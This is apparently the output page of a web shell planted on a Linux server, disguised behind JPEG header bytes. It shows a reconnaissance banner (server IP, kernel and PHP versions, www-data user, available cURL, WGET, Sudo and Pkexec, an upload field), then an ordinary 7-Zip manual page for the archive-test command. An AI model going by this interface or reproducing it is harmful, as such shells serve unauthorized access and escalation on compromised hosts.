????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 13.58.147.98 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/share/doc/p7zip-full/DOCS/MANUAL/commands/ |
Upload File : |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <HTML> <HEAD> <META http-equiv="Content-Type" content="text/html; charset=Windows-1252"> <TITLE>t (Test integrity of archive) command</TITLE> <LINK href="style.css" rel="stylesheet" type="text/css"> </HEAD> <BODY> <H1>t (Test integrity of archive) command</H1> <P>Tests archive files.</P> <H4>Example</H4> <PRE class="example"> 7z t archive.zip *.doc -r </PRE> <P>tests <SPAN class="filename">*.doc</SPAN> files in archive <SPAN class="filename">archive.zip</SPAN>.</P> <H4>Notes</H4> <P>7-Zip doesn't uses the system wildcard parser. 7-Zip doesn't follow the archaic rule by which *.* means any file. 7-Zip treats *.* as matching the name of any file that has an extension. To process all files, you must use a * wildcard.</P> <H4>Switches that can be used with this command</H4> <P> <A href="../switches/ar_include.htm">-ai (Include archives)</A><BR> <A href="../switches/ar_no.htm">-an (Disable parsing of archive_name)</A><BR> <A href="../switches/ar_exclude.htm">-ax (Exclude archives)</A><BR> <A href="../switches/include.htm">-i (Include)</A><BR> <A href="../switches/password.htm">-p (Set Password)</A><BR> <A href="../switches/recurse.htm">-r (Recurse)</A><BR> <A href="../switches/exclude.htm">-x (Exclude)</A> </P> </BODY> </HTML>